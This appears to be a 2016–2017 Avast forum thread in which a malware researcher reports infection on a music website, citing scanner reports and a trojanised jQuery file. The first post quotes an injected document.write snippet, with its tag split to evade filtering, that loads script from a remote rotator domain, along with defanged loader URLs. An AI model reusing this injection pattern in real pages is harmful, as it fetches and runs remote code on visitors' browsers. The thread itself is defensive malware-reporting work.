Author Topic: Malware and malware links on website?  (Read 1519 times)

0 Members and 2 Guests are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34060
  • malware fighter
Malware and malware links on website?
« on: July 05, 2016, 01:54:11 PM »
See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fmytracklist.com%2Fallmusic.htm
External link with trojan: https://www.virustotal.com/en-gb/domain/am15.net/information/
Element   Reason
HTML JavaScript code   JavaScript virus injection Reason: load .php Code: -http://am15.net/bn.php?s=43545&f=6&d=91380
HTML JavaScript code   JavaScript virus injection Reason: load .php Code: -http://am15.net/bn.php?s=43545&f=7&d=66750

Suspicious domain detected. Details: http://siteguarding.com/malware/malware-entry-mwblacklisted35 document.write('<scr'+'ipt type="text/javascript" src="-http://rotator.luxup.ru/top/39/?t='+((new Date()).getTime()%10000000)*100+Math.round(Math.random()*99)+'"><'+'/scr'+'ipt>');

jQuery libraries to be retired, 13 vulnerable detected: http://retire.insecurity.today/#!/scan/be7e8b4975da850ae93ae5dbea8df77358bbcb7d7b442d509eaaa21753a495d3

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34060
  • malware fighter
Re: Malware and malware links on website?
« Reply #1 on: April 05, 2017, 11:01:54 PM »
Update. Avast detected this AvastJS:Iframe-AMQ [Trj] on -mytracklist.com/js/jquery-1.7.min.js
Known infection source, but missed here: http://urlquery.net/report.php?id=1491424375750
and here: https://sitecheck.sucuri.net/results/mytracklist.com/
Not flagged: https://urlscan.io/result/19bd759b-a08e-4b28-b7e5-d033c4d0b15a#summary

The two vulnerable jQuery libraries (one infested): http://retire.insecurity.today/#!/scan/e5a372c1a536feec91e85a6a05a29776a42e1a03516ebb48134beeae297acbb2

Powered by: PHP/5.4.30-1~dotdeb.1

Spammy looking links
Any links with funky anchor text? Yes.
Quote
<a href="javascript:void(0)" onclick="document.getElementById('letters_module').style.display='none'; document.getElementById('show_letters').style.display='block'; document.getElementById('hide_letters').style.display='none';">?????? ????? ?? ??????</a>

Malicious: https://quttera.com/detailed_report/mytracklist.com

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!